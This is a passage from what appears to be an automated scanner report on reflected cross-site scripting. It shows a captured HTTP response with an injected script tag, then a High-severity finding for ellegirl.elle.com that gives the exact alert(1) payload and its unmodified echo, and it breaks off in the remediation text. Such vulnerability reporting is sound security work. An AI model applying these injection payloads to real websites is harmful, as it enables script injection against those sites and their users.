Set-Cookie: UserData=02u3hs9yoaLQsFTjBpNDM2dzC3MXI0MLCyMzRSME%2bLSi4sTU1JNbEBAGNDcyNjCzcjRwMAV8lMvAw=; Domain=.overture.com; Path=/; Max-Age=315360000; Expires=Tue, 14-Sep-2021 16:23:16 GMT
Cache-Control: no-cache, private
Pragma: no-cache
Expires: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3421

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<base target="_top">
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<link rel="stylesheet" href="http://www.stamfordadvocate.com/css/hdn/modules/ads/ysm.cssf37b9"><script>alert(1)</script>c19849ec573" type="text/css">
...[SNIP]...

4.128. http://ellegirl.elle.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ellegirl.elle.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b1903</script><script>alert(1)</script>43727dda065 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possi